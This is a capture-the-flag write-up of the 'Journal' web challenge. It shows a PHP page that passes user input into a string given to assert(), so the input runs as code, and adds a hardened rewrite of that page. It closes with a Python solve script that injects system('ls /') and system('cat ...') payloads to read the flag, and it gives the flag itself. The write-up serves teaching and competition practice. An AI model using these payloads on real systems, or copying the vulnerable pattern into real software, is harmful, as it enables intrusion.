# Web - Journal

## Description

dear diary, there is no LFI in this app

## Downloads

{% file src="<https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FVLhGcbR2iGKikTG67HYh%2Fjournal-dist.zip?alt=media&token=ef2f1680-b983-4985-9ceb-c7c9cd4d89cb>" %}

## Solution

The provided PHP file:

```php
<?php

echo "<p>Welcome to my journal app!</p>";
echo "<p><a href=/?file=file1.txt>file1.txt</a></p>";
echo "<p><a href=/?file=file2.txt>file2.txt</a></p>";
echo "<p><a href=/?file=file3.txt>file3.txt</a></p>";
echo "<p><a href=/?file=file4.txt>file4.txt</a></p>";
echo "<p><a href=/?file=file5.txt>file5.txt</a></p>";
echo "<p>";

if (isset($_GET['file'])) {
  $file = $_GET['file'];
  $filepath = './files/' . $file;

  assert("strpos('$file', '..') === false") or die("Invalid file!");

  if (file_exists($filepath)) {
    include($filepath);
  } else {
    echo 'File not found!';
  }
}

echo "</p>";
```

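It's a simple enough challenge that looks like your typical LFI but, like the description says, this is not an LFI challenge.

As it turns out, when `assert()` is given a string it evaluates that string as PHP code, so it basically works like `eval()`, and we all know the horrors of `eval`. Here `$file` is interpolated straight into that string, so whatever arrives in the `file` parameter becomes part of the code being evaluated. This page on HackTricks explains it all.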

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FTtsHFyrnTt9HDnhr5Bw1%2Fimage.png?alt=media&#x26;token=df54f1b0-2582-431e-a80a-51a9b0e58e4e" alt=""><figcaption><p>HackTricks</p></figcaption></figure>
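For comparison, a hardened version of the file-loading branch, written as an added example that is not part of the challenge source. `FILES_DIR` and `resolve_journal_file()` are names chosen for this example; the checks are ordinary PHP with no string ever passed to `assert()` (string assertions were deprecated in PHP 7.2 and removed in PHP 8.0).

```php
<?php
declare(strict_types=1);

// Hypothetical constant for this example: the only directory served.
const FILES_DIR = __DIR__ . '/files';

/**
 * Return the canonical path of a journal file, or null when the request
 * does not name a regular file directly inside FILES_DIR.
 */
function resolve_journal_file(string $name): ?string
{
    // Allowlist the shape of the name instead of blocklisting "..".
    // Nothing from the request is ever assembled into code.
    if (preg_match('/\A[A-Za-z0-9_-]+\.txt\z/', $name) !== 1) {
        return null;
    }

    // Canonicalise both sides so symlinks and odd separators are resolved.
    $base = realpath(FILES_DIR);
    $path = realpath(FILES_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }

    // Containment check on the resolved path, not on the raw input.
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

$file = $_GET['file'] ?? null;

// ?file[]=x arrives as an array; only a plain string is accepted.
if (is_string($file)) {
    $path = resolve_journal_file($file);
    if ($path === null) {
        http_response_code(400);
        exit('Invalid file!');
    }
    // Read the file as data and escape it. include() would execute any
    // PHP the file contains, which a text viewer never needs.
    echo htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
}
```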

It is also worth noting from the provided Dockerfile that the flag file name has random characters appended, which hinted towards getting an RCE.

<figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FUFCaSLfbbXCDXxyJbWCo%2Fimage.png?alt=media&#x26;token=fd27a080-93d6-4f30-b750-48262f9f2e9e" alt=""><figcaption><p>Docker file</p></figcaption></figure>

Final solution:

```python
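import requests
import urllib.parse

# The payload closes the single-quoted string inside the assert() argument,
# so the rest of it is evaluated as PHP. First, list / to find the flag file.
payload = urllib.parse.quote_plus("'.die(system('ls /')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)

# Then read the flag using the randomized file name from the listing.
payload = urllib.parse.quote_plus("'.die(system('cat /flag-cARdaInFg6dD10uWQQgm.txt')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)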
```

Flag: `ictf{assertion_failed_e3106922feb13b10}`
